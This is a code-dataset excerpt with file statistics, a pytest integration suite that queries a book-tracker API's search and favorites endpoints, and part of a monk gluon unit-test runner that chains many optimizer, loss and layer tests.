| 0.881904
| 0.881904
| 0.879011
| 0.879011
| 0.853761
| 0
| 0.009196
| 0.133876
| 5,901
| 90
| 750
| 65.566667
| 0.73469
| 0.050839
| 0
| 0.571429
| 0
| 0.071429
| 0.599416
| 0.550119
| 0
| 0
| 0
| 0
| 0.142857
| 1
| 0.107143
| false
| 0
| 0.071429
| 0
| 0.214286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
480899c17096ae066bfc2073d74d0db397dfdc60
| 20,783
|
py
|
Python
|
tests/integration_test.py
|
brandonwarech/book-tracker-capstone
|
d2b66db94a9be6b1577e2d8eb4b5b9d8eb87b790
|
[
"Apache-2.0"
] | null | null | null |
tests/integration_test.py
|
brandonwarech/book-tracker-capstone
|
d2b66db94a9be6b1577e2d8eb4b5b9d8eb87b790
|
[
"Apache-2.0"
] | null | null | null |
tests/integration_test.py
|
brandonwarech/book-tracker-capstone
|
d2b66db94a9be6b1577e2d8eb4b5b9d8eb87b790
|
[
"Apache-2.0"
] | 1
|
2019-06-25T07:01:58.000Z
|
2019-06-25T07:01:58.000Z
|
#!/usr/bin/python
import pytest
import sys
import requests
import json
import random
headers = {'X-API-KEY':'test_token'}
invalid_headers = {'X-API-KEY':'wrong_token'}
random_num = random.randint(1111111,999999999)
#########################################################
# Cloud Tests #
#########################################################
def test_api_cloud_get_search_book():
req_url = "http://book-tracker-orch1-brave-elephant.mybluemix.net/api/search/Phillip%20Laplante"
r = requests.get(url = req_url, headers = headers)
assert r.json() == { "body": { "books": [ { "author": [ "Phillip Laplante" ], "isbn": "9780830639526", "publication_date": 1992, "publisher": "Windcrest", "title": "Easy PC maintenance and repair" }, { "author": [ "Phillip Laplante" ], "isbn": "0780347315", "publication_date": 1999, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Electrical Engineering Dictionary" }, { "author": [ "Phillip Laplante" ], "isbn": "9780849326974", "publication_date": 2000, "publisher": "Crc Pr I Llc", "title": "Dictionary of Computer Science, Engineering, and Technology" }, { "author": [ "Phillip Laplante" ], "isbn": "0780323394", "publication_date": 1997, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Design and Application of Real-Time Systems" }, { "author": [ "Phillip A. Laplante" ], "isbn": "9780830639526", "publication_date": 1992, "publisher": "Windcrest/McGraw-Hill", "title": "Easy PC maintenance and repair" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0849313767", "publication_date": 2003, "publisher": "Taylor and Francis", "title": "Software engineering for image processing systems" }, { "author": [ "Phillip A. Laplante" ], "isbn": "1420031244", "publication_date": 2005, "publisher": "Taylor and Francis", "title": "AntiPatterns" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0849372283", "publication_date": 2007, "publisher": "Taylor and Francis", "title": "What every engineer should know about software engineering" }, { "author": [ "Phillip A. Laplante" ], "isbn": "9780780348158", "publication_date": 1999, "publisher": "Institute of Electrical & Electronics Enginee", "title": "A Practical Approach to Real-Time Systems" }, { "author": [ "Phillip A. Laplante" ], "isbn": "9780780348035", "publication_date": 1999, "publisher": "Institute of Electtrical and Electronics Engineers", "title": "Keys to Successful Software Development" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0780353412", "publication_date": 2001, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Real-Time Systems" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0780368169", "publication_date": 1996, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Design and Application of Real-Time Systems" }, { "author": [ "Phillip A. Laplante" ], "isbn": "9780780348028", "publication_date": 1999, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Successful Software Project Management" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0830644342", "publication_date": 1993, "publisher": "Windcrest/McGraw Hill", "title": "Fractal mania" }, { "author": [ "Phillip A. Laplante" ], "isbn": "9780780348387", "publication_date": 2001, "publisher": "Inst Elect & Electronic Engineers", "title": "Software Engineering Ssc" }, { "author": [ "Phillip A. Laplante" ], "isbn": "1590338898", "publication_date": 2003, "publisher": "Nova Science Publishers", "title": "Biocomputing" }, { "author": [ "Phillip Laplante", "Thomas Costello" ], "isbn": "0131855891", "publication_date": 2005, "publisher": "Prentice Hall PTR", "title": "CIO Wisdom II" }, { "author": [ "Phillip Laplante", "Thomas Costello" ], "isbn": "0131855891", "publication_date": 2005, "publisher": "Prentice Hall PTR", "title": "CIO Wisdom II" }, { "author": [ "Phillip A. Laplante" ], "isbn": "9781439820858", "publication_date": 2011, "publisher": "CRC Press", "title": "Technical Writing A Practical Guide For Engineers And Scientists" }, { "author": [ "Phillip A. Laplante" ], "isbn": "9780849326912", "publication_date": 2001, "publisher": "CRC Press", "title": "Dictionary of computer science, engineering, and technology" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0314012621", "publication_date": 1993, "publisher": "West Pub. Co.", "title": "Using UNIX" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0849330866", "publication_date": 2005, "publisher": "Taylor & Francis Books Ltd/CRC", "title": "Comprehensive dictionary of electrical engineering" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0849331285", "publication_date": 1999, "publisher": "CRC Press", "title": "Comprehensive dictionary of electrical engineering" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0471228559", "publication_date": 2004, "publisher": "Wiley", "title": "Real-time system design and analysis" }, { "author": [ "Phillip A. Laplante", "Philip A. Laplante" ], "isbn": "9780780311527", "publication_date": 1993, "publisher": "IEEE Computer Society Press", "title": "Real-Time Systems Design and Analysis" }, { "author": [ "Philip A. Laplante", "Phillip A. Laplante" ], "isbn": "9781420059779", "publication_date": 2010, "publisher": "AUERBACH", "title": "Encyclopedia of Software Engineering, Three Volume Set" }, { "author": [ "Nasser Kehtarnavaz", "Phillip A. Laplante" ], "isbn": "9780819461032", "publication_date": 2006, "publisher": "IS&T", "title": "Real-time image processing 2006" }, { "author": [ "Nasser Kehtarnavaz", "Phillip A. Laplante" ], "isbn": "0819456446", "publication_date": 2005, "publisher": "IS&T", "title": "Real-time imaging IX" }, { "author": [ "Nasser Kehtarnavaz", "Phillip A. Laplante" ], "isbn": "9780819448125", "publication_date": 2003, "publisher": "SPIE", "title": "Real-time imaging VII" }, { "author": [ "Phillip A. Laplante", "Colin J. Neill", "Philip A. Laplante" ], "isbn": "9781420064674", "publication_date": 2009, "publisher": "Auerbach Publications", "title": "Requirements engineering for software and systems" }, { "author": [ "Phillip A. Laplante", "Alexander D. Stoyenko" ], "isbn": "0780310683", "publication_date": 1996, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Real-time imaging" }, { "author": [ "William F. Gilreath", "Phillip A. Laplante" ], "isbn": "1402074166", "publication_date": 2003, "publisher": "Springer", "title": "Computer architecture" }, { "author": [ "Philip A. Laplante" ], "isbn": "9781420037807", "publication_date": 2005, "publisher": "Taylor and Francis", "title": "Comprehensive Dictionary of Electrical Engineering" }, { "author": [ "Philip A. Laplante" ], "isbn": "9780780348240", "publication_date": 2000, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Real-Time Signal and Image Processing" }, { "author": [ "Phillip A. Laplante", "Wolfgang A. Halang", "P. Laplante", "W.A. Halang" ], "isbn": "9780080425900", "publication_date": 1996, "publisher": "Pergamon", "title": "Real time programming 1995" }, { "author": [ "C. B. Johnson", "Divyendu Sinha", "Phillip A. Laplante" ], "isbn": "0819445630", "publication_date": 2003, "publisher": "SPIE", "title": "Low-light-level and real-time imaging systems, components, and applications" }, { "author": [ "Phillip A. Laplante", "Alexander D. Stoyenko", "Divyendu Sinha" ], "isbn": "0819420352", "publication_date": 1996, "publisher": "SPIE", "title": "Real-time imaging" }, { "author": [ "William F. Gilreath" ], "isbn": "146134980X", "publication_date": 2003, "publisher": "Springer US", "title": "Computer Architecture: A Minimalist Perspective" }, { "author": [ "Edward R. Dougherty" ], "isbn": "9780819417893", "publication_date": 1995, "publisher": "SPIE Optical Engineering Press", "title": "Introduction to real-time imaging" }, { "author": [ "Bad author - no name" ], "isbn": "9780819448125", "publication_date": 2003, "publisher": "SPIE", "title": "Real-time imaging VII" }, { "author": [ "Colin J. Neill" ], "isbn": "1439861862", "publication_date": 2011, "publisher": "Auerbach Publications", "title": "Antipatterns" } ] }, "headers": { "Content-Type": "application/json" }, "statusCode": 200 }
def test_api_cloud_get_favorites_without_token():
req_url = "http://book-tracker-orch1-brave-elephant.mybluemix.net/api/favorites/TEST"
r = requests.get(url = req_url)
assert r.json() == { "message": "Token is missing" }
def test_api_cloud_with_incorrect_token():
req_url = "http://book-tracker-orch1-brave-elephant.mybluemix.net/api/favorites/TEST"
r = requests.get(url = req_url, headers=invalid_headers)
assert r.json() == { "message": "Incorrect token" }
def test_api_cloud_get_favorites_noresult():
req_url = "http://book-tracker-orch1-brave-elephant.mybluemix.net/api/favorites/FDSFDSFS"
r = requests.get(url = req_url, headers=headers)
assert r.json() == { "body": [ False ], "headers": { "Content-Type": "application/json" }, "statusCode": 200 }
def test_api_cloud_get_favorites_result():
req_url = "http://book-tracker-orch1-brave-elephant.mybluemix.net/api/favorites/testforJin%40test.com"
r = requests.get(url = req_url, headers=headers )
assert r.json() == { "body": [ { "AUTHOR": "Test", "CATEGORY": None, "GENRE": None, "ISBN": "Jin123", "PUBLICATION_DATE": "string", "PUBLISHER": "string", "TITLE": "Jinny", "USER_ID": "testforJin@test.com" } ], "headers": { "Content-Type": "application/json" }, "statusCode": 200 }
def test_api_cloud_post_favorites_valid():
req_url = "http://book-tracker-orch1-brave-elephant.mybluemix.net/api/favorites/integrationtest"
random_num = random.randint(1111111,999999999)
data = { "isbn": random_num, "author": "intg test", "title": "intg test", "publisher": "intg test", "publication_date": "intg test" }
r = requests.post(url = req_url, headers=headers, json=data)
assert r.json() == { "statusCode": 200, "headers": { "Content-Type": "application/json" }, "body": "Success! 1 rows affected" }
def test_api_cloud_post_favorites_invalid():
req_url = "http://book-tracker-orch1-brave-elephant.mybluemix.net/api/favorites/integrationtest"
data = { "author": "intg test", "title": "intg test", "publisher": "intg test", "publication_date": "intg test" }
r = requests.post(url = req_url, headers=headers, json=data)
assert r.json() == 'Error: Not all parameters supplied in POST Body json request payload (isbn, title, author)'
def test_api_cloud_delete_favorites():
assert False
#########################################################
# Local Tests #
#########################################################
def test_api_local_get_search_book():
req_url = "http://127.0.0.1:5000/api/search/Phillip%20Laplante"
r = requests.get(url = req_url, headers = headers)
assert r.json() == { "body": { "books": [ { "author": [ "Phillip Laplante" ], "isbn": "9780830639526", "publication_date": 1992, "publisher": "Windcrest", "title": "Easy PC maintenance and repair" }, { "author": [ "Phillip Laplante" ], "isbn": "0780347315", "publication_date": 1999, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Electrical Engineering Dictionary" }, { "author": [ "Phillip Laplante" ], "isbn": "9780849326974", "publication_date": 2000, "publisher": "Crc Pr I Llc", "title": "Dictionary of Computer Science, Engineering, and Technology" }, { "author": [ "Phillip Laplante" ], "isbn": "0780323394", "publication_date": 1997, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Design and Application of Real-Time Systems" }, { "author": [ "Phillip A. Laplante" ], "isbn": "9780830639526", "publication_date": 1992, "publisher": "Windcrest/McGraw-Hill", "title": "Easy PC maintenance and repair" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0849313767", "publication_date": 2003, "publisher": "Taylor and Francis", "title": "Software engineering for image processing systems" }, { "author": [ "Phillip A. Laplante" ], "isbn": "1420031244", "publication_date": 2005, "publisher": "Taylor and Francis", "title": "AntiPatterns" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0849372283", "publication_date": 2007, "publisher": "Taylor and Francis", "title": "What every engineer should know about software engineering" }, { "author": [ "Phillip A. Laplante" ], "isbn": "9780780348158", "publication_date": 1999, "publisher": "Institute of Electrical & Electronics Enginee", "title": "A Practical Approach to Real-Time Systems" }, { "author": [ "Phillip A. Laplante" ], "isbn": "9780780348035", "publication_date": 1999, "publisher": "Institute of Electtrical and Electronics Engineers", "title": "Keys to Successful Software Development" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0780353412", "publication_date": 2001, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Real-Time Systems" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0780368169", "publication_date": 1996, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Design and Application of Real-Time Systems" }, { "author": [ "Phillip A. Laplante" ], "isbn": "9780780348028", "publication_date": 1999, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Successful Software Project Management" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0830644342", "publication_date": 1993, "publisher": "Windcrest/McGraw Hill", "title": "Fractal mania" }, { "author": [ "Phillip A. Laplante" ], "isbn": "9780780348387", "publication_date": 2001, "publisher": "Inst Elect & Electronic Engineers", "title": "Software Engineering Ssc" }, { "author": [ "Phillip A. Laplante" ], "isbn": "1590338898", "publication_date": 2003, "publisher": "Nova Science Publishers", "title": "Biocomputing" }, { "author": [ "Phillip Laplante", "Thomas Costello" ], "isbn": "0131855891", "publication_date": 2005, "publisher": "Prentice Hall PTR", "title": "CIO Wisdom II" }, { "author": [ "Phillip Laplante", "Thomas Costello" ], "isbn": "0131855891", "publication_date": 2005, "publisher": "Prentice Hall PTR", "title": "CIO Wisdom II" }, { "author": [ "Phillip A. Laplante" ], "isbn": "9781439820858", "publication_date": 2011, "publisher": "CRC Press", "title": "Technical Writing A Practical Guide For Engineers And Scientists" }, { "author": [ "Phillip A. Laplante" ], "isbn": "9780849326912", "publication_date": 2001, "publisher": "CRC Press", "title": "Dictionary of computer science, engineering, and technology" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0314012621", "publication_date": 1993, "publisher": "West Pub. Co.", "title": "Using UNIX" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0849330866", "publication_date": 2005, "publisher": "Taylor & Francis Books Ltd/CRC", "title": "Comprehensive dictionary of electrical engineering" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0849331285", "publication_date": 1999, "publisher": "CRC Press", "title": "Comprehensive dictionary of electrical engineering" }, { "author": [ "Phillip A. Laplante" ], "isbn": "0471228559", "publication_date": 2004, "publisher": "Wiley", "title": "Real-time system design and analysis" }, { "author": [ "Phillip A. Laplante", "Philip A. Laplante" ], "isbn": "9780780311527", "publication_date": 1993, "publisher": "IEEE Computer Society Press", "title": "Real-Time Systems Design and Analysis" }, { "author": [ "Philip A. Laplante", "Phillip A. Laplante" ], "isbn": "9781420059779", "publication_date": 2010, "publisher": "AUERBACH", "title": "Encyclopedia of Software Engineering, Three Volume Set" }, { "author": [ "Nasser Kehtarnavaz", "Phillip A. Laplante" ], "isbn": "9780819461032", "publication_date": 2006, "publisher": "IS&T", "title": "Real-time image processing 2006" }, { "author": [ "Nasser Kehtarnavaz", "Phillip A. Laplante" ], "isbn": "0819456446", "publication_date": 2005, "publisher": "IS&T", "title": "Real-time imaging IX" }, { "author": [ "Nasser Kehtarnavaz", "Phillip A. Laplante" ], "isbn": "9780819448125", "publication_date": 2003, "publisher": "SPIE", "title": "Real-time imaging VII" }, { "author": [ "Phillip A. Laplante", "Colin J. Neill", "Philip A. Laplante" ], "isbn": "9781420064674", "publication_date": 2009, "publisher": "Auerbach Publications", "title": "Requirements engineering for software and systems" }, { "author": [ "Phillip A. Laplante", "Alexander D. Stoyenko" ], "isbn": "0780310683", "publication_date": 1996, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Real-time imaging" }, { "author": [ "William F. Gilreath", "Phillip A. Laplante" ], "isbn": "1402074166", "publication_date": 2003, "publisher": "Springer", "title": "Computer architecture" }, { "author": [ "Philip A. Laplante" ], "isbn": "9781420037807", "publication_date": 2005, "publisher": "Taylor and Francis", "title": "Comprehensive Dictionary of Electrical Engineering" }, { "author": [ "Philip A. Laplante" ], "isbn": "9780780348240", "publication_date": 2000, "publisher": "Institute of Electrical & Electronics Enginee", "title": "Real-Time Signal and Image Processing" }, { "author": [ "Phillip A. Laplante", "Wolfgang A. Halang", "P. Laplante", "W.A. Halang" ], "isbn": "9780080425900", "publication_date": 1996, "publisher": "Pergamon", "title": "Real time programming 1995" }, { "author": [ "C. B. Johnson", "Divyendu Sinha", "Phillip A. Laplante" ], "isbn": "0819445630", "publication_date": 2003, "publisher": "SPIE", "title": "Low-light-level and real-time imaging systems, components, and applications" }, { "author": [ "Phillip A. Laplante", "Alexander D. Stoyenko", "Divyendu Sinha" ], "isbn": "0819420352", "publication_date": 1996, "publisher": "SPIE", "title": "Real-time imaging" }, { "author": [ "William F. Gilreath" ], "isbn": "146134980X", "publication_date": 2003, "publisher": "Springer US", "title": "Computer Architecture: A Minimalist Perspective" }, { "author": [ "Edward R. Dougherty" ], "isbn": "9780819417893", "publication_date": 1995, "publisher": "SPIE Optical Engineering Press", "title": "Introduction to real-time imaging" }, { "author": [ "Bad author - no name" ], "isbn": "9780819448125", "publication_date": 2003, "publisher": "SPIE", "title": "Real-time imaging VII" }, { "author": [ "Colin J. Neill" ], "isbn": "1439861862", "publication_date": 2011, "publisher": "Auerbach Publications", "title": "Antipatterns" } ] }, "headers": { "Content-Type": "application/json" }, "statusCode": 200 }
def test_api_local_get_favorites_without_token():
req_url = "http://127.0.0.1:5000/api/favorites/TEST"
r = requests.get(url = req_url)
assert r.json() == { "message": "Token is missing" }
def test_api_local_with_incorrect_token():
req_url = "http://127.0.0.1:5000/api/favorites/TEST"
r = requests.get(url = req_url, headers=invalid_headers)
assert r.json() == { "message": "Incorrect token" }
def test_api_local_get_favorites_noresult():
req_url = "http://127.0.0.1:5000/api/favorites/FDSFDSFS"
r = requests.get(url = req_url, headers=headers)
assert r.json() == { "body": [ False ], "headers": { "Content-Type": "application/json" }, "statusCode": 200 }
def test_api_local_get_favorites_result():
req_url = "http://127.0.0.1:5000/api/favorites/testforJin%40test.com"
r = requests.get(url = req_url, headers=headers)
assert r.json() == { "body": [ { "AUTHOR": "Test", "CATEGORY": None, "GENRE": None, "ISBN": "Jin123", "PUBLICATION_DATE": "string", "PUBLISHER": "string", "TITLE": "Jinny", "USER_ID": "testforJin@test.com" } ], "headers": { "Content-Type": "application/json" }, "statusCode": 200 }
def test_api_local_post_favorites_valid():
req_url = "http://127.0.0.1:5000/api/favorites/integrationtest"
random_num = random.randint(1111111,999999999)
data = { "isbn": random_num, "author": "intg test", "title": "intg test", "publisher": "intg test", "publication_date": "intg test" }
r = requests.post(url = req_url, headers=headers, json=data)
assert r.status_code == 200
assert r.json() == { "statusCode": 200, "headers": { "Content-Type": "application/json" }, "body": "Success! 1 rows affected" }
def test_api_local_post_favorites_invalid():
req_url = "http://127.0.0.1:5000/api/favorites/integrationtest"
random_num = random.randint(1111111,999999999)
data = { "isbn": random_num, "author": "intg test", "title": "intg test", "publisher": "intg test", "publication_date": "intg test" }
r = requests.post(url = req_url, headers=headers, json=data)
assert r.json() == { "statusCode": 200, "headers": { "Content-Type": "application/json" }, "body": "Success! 1 rows affected" }
| 205.772277
| 7,670
| 0.674542
| 2,340
| 20,783
| 5.902564
| 0.124359
| 0.095569
| 0.067188
| 0.069505
| 0.979511
| 0.977339
| 0.960107
| 0.959094
| 0.959094
| 0.957646
| 0
| 0.080866
| 0.128903
| 20,783
| 101
| 7,671
| 205.772277
| 0.682059
| 0.004956
| 0
| 0.567568
| 0
| 0.108108
| 0.636916
| 0.002056
| 0
| 0
| 0
| 0
| 0.216216
| 1
| 0.202703
| false
| 0
| 0.067568
| 0
| 0.27027
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
4819c50ce7a2ad019e99fe5127d6f4cd7a8d4778
| 31,733
|
py
|
Python
|
monk/system_unit_tests/gluon/run_tests.py
|
take2rohit/monk_v1
|
9c567bf2c8b571021b120d879ba9edf7751b9f92
|
[
"Apache-2.0"
] | 542
|
2019-11-10T12:09:31.000Z
|
2022-03-28T11:39:07.000Z
|
monk/system_unit_tests/gluon/run_tests.py
|
take2rohit/monk_v1
|
9c567bf2c8b571021b120d879ba9edf7751b9f92
|
[
"Apache-2.0"
] | 117
|
2019-11-12T09:39:24.000Z
|
2022-03-12T00:20:41.000Z
|
monk/system_unit_tests/gluon/run_tests.py
|
take2rohit/monk_v1
|
9c567bf2c8b571021b120d879ba9edf7751b9f92
|
[
"Apache-2.0"
] | 246
|
2019-11-09T21:53:24.000Z
|
2022-03-29T00:57:07.000Z
|
import os
import sys
import time
from test_optimizer_sgd import test_optimizer_sgd
from test_optimizer_nesterov_sgd import test_optimizer_nesterov_sgd
from test_optimizer_rmsprop import test_optimizer_rmsprop
from test_optimizer_momentum_rmsprop import test_optimizer_momentum_rmsprop
from test_optimizer_adam import test_optimizer_adam
from test_optimizer_adamax import test_optimizer_adamax
from test_optimizer_adadelta import test_optimizer_adadelta
from test_optimizer_adagrad import test_optimizer_adagrad
from test_optimizer_nadam import test_optimizer_nadam
from test_optimizer_signum import test_optimizer_signum
from test_loss_l1 import test_loss_l1
from test_loss_l2 import test_loss_l2
from test_loss_softmax_crossentropy import test_loss_softmax_crossentropy
from test_loss_crossentropy import test_loss_crossentropy
from test_loss_sigmoid_binary_crossentropy import test_loss_sigmoid_binary_crossentropy
from test_loss_binary_crossentropy import test_loss_binary_crossentropy
from test_loss_kldiv import test_loss_kldiv
from test_loss_poisson_nll import test_loss_poisson_nll
from test_loss_huber import test_loss_huber
from test_loss_hinge import test_loss_hinge
from test_loss_squared_hinge import test_loss_squared_hinge
from test_layer_convolution1d import test_layer_convolution1d
from test_layer_convolution2d import test_layer_convolution2d
from test_layer_convolution3d import test_layer_convolution3d
from test_layer_transposed_convolution1d import test_layer_transposed_convolution1d
from test_layer_transposed_convolution2d import test_layer_transposed_convolution2d
from test_layer_transposed_convolution3d import test_layer_transposed_convolution3d
from test_layer_max_pooling1d import test_layer_max_pooling1d
from test_layer_max_pooling2d import test_layer_max_pooling2d
from test_layer_max_pooling3d import test_layer_max_pooling3d
from test_layer_average_pooling1d import test_layer_average_pooling1d
from test_layer_average_pooling2d import test_layer_average_pooling2d
from test_layer_average_pooling3d import test_layer_average_pooling3d
from test_layer_global_max_pooling1d import test_layer_global_max_pooling1d
from test_layer_global_max_pooling2d import test_layer_global_max_pooling2d
from test_layer_global_max_pooling3d import test_layer_global_max_pooling3d
from test_layer_global_average_pooling1d import test_layer_global_average_pooling1d
from test_layer_global_average_pooling2d import test_layer_global_average_pooling2d
from test_layer_global_average_pooling3d import test_layer_global_average_pooling3d
from test_layer_batch_normalization import test_layer_batch_normalization
from test_layer_instance_normalization import test_layer_instance_normalization
from test_layer_layer_normalization import test_layer_layer_normalization
from test_layer_identity import test_layer_identity
from test_layer_fully_connected import test_layer_fully_connected
from test_layer_dropout import test_layer_dropout
from test_layer_flatten import test_layer_flatten
from test_activation_relu import test_activation_relu
from test_activation_sigmoid import test_activation_sigmoid
from test_activation_tanh import test_activation_tanh
from test_activation_softplus import test_activation_softplus
from test_activation_softsign import test_activation_softsign
from test_activation_elu import test_activation_elu
from test_activation_gelu import test_activation_gelu
from test_activation_prelu import test_activation_prelu
from test_activation_leaky_relu import test_activation_leaky_relu
from test_activation_selu import test_activation_selu
from test_activation_swish import test_activation_swish
from test_layer_concatenate import test_layer_concatenate
from test_initializer_xavier_normal import test_initializer_xavier_normal
from test_initializer_xavier_uniform import test_initializer_xavier_uniform
from test_initializer_orthogonal_normal import test_initializer_orthogonal_normal
from test_initializer_orthogonal_uniform import test_initializer_orthogonal_uniform
from test_initializer_normal import test_initializer_normal
from test_initializer_uniform import test_initializer_uniform
from test_initializer_msra import test_initializer_msra
from test_block_resnet_v1 import test_block_resnet_v1
from test_block_resnet_v2 import test_block_resnet_v2
from test_block_resnet_v1_bottleneck import test_block_resnet_v1_bottleneck
from test_block_resnet_v2_bottleneck import test_block_resnet_v2_bottleneck
from test_block_resnext import test_block_resnext
from test_block_mobilenet_v2_linear_bottleneck import test_block_mobilenet_v2_linear_bottleneck
from test_block_mobilenet_v2_inverted_linear_bottleneck import test_block_mobilenet_v2_inverted_linear_bottleneck
from test_block_squeezenet_fire import test_block_squeezenet_fire
from test_block_densenet import test_block_densenet
from test_block_conv_bn_relu import test_block_conv_bn_relu
from test_block_inception_a import test_block_inception_a
from test_block_inception_b import test_block_inception_b
from test_block_inception_c import test_block_inception_c
from test_block_inception_d import test_block_inception_d
from test_block_inception_e import test_block_inception_e
origstdout = sys.stdout
print("Running Tests...");
sys.stdout = open("test_logs.txt", 'w');
try:
print("System Check");
from mxnet.runtime import feature_list
print("Runtime elements - {}".format(feature_list()));
print("");
except:
print("Installation incomplete");
sys.exit(0);
system_dict = {};
system_dict["total_tests"] = 0;
system_dict["successful_tests"] = 0;
system_dict["failed_tests_lists"] = [];
system_dict["failed_tests_exceptions"] = [];
system_dict["skipped_tests_lists"] = [];
start = time.time()
exp_num = 1;
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_max_pooling1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_max_pooling2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_max_pooling3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_average_pooling1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_average_pooling2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_average_pooling3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_max_pooling1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_max_pooling2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_max_pooling3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_average_pooling1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_average_pooling2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_average_pooling3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_sgd(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_nesterov_sgd(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_rmsprop(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_momentum_rmsprop(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_adam(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_adamax(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
